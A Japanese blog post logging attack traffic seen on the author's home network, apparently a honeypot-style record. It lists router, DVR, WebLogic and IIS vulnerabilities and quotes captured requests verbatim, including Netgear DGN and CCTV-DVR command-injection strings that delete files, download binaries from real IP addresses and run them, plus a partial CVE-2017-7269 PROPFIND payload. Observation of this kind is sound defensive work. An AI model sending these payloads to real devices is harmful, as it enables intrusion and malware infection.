通信解析2
以下から変化した内容を。
■脆弱性検知
・Netbios null session
NetBIOS Enumeration And Null Sessionxtraweb.wordpress.com
・LinkSys E-series ルータの脆弱性
うちには"http://xxx//tmUnblock.cgi" のアクセスがきました。
That new Linksys worm... : netsec
・Huawei Router HG532 - Arbitrary Command Execution
うちには”POST /ctrlt/DeviceUpgrade_1 HTTP/1.1”のアクセスがきました。
・Netgear DGN の脆弱性
うちには
"GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://68.183.28.29/cock+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0"
こちらがきました。
Bugtraq: Unauthenticated command execution on Netgear DGN devices
・CVE-2017-5638 (これは中国から大量に)
・CVE-2017-10271/CVE-2017-3506
ハニーポット観察記録(38)「WebLogic の WLS Security に対するコマンド実行の試み(CVE-2017-10271)」 at www.morihi-soc.net
・Multiple CCTV-DVR Vendors - Remote Code Execution
我が家にはこちらが。
GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://209.141.50.26/b;sh${IFS}/tmp/bm&>r&&tar${IFS}/string.js HTTP/1.0
・CVE-2017-7269
うちにはこちらが。
PROPFIND / HTTP/1.1
Host: localhost
Connection: Close
Content-Length: 0
If: <http://localhost/aaaaaaa........................................................................................................................................................................................................................................................................................................................................................................................................................................> (Not <locktoken:write1>) <http://localhost/bbbbbbb.............................................................................................................................................................................................................................................................................................................................................................................................
続きは明日以降で。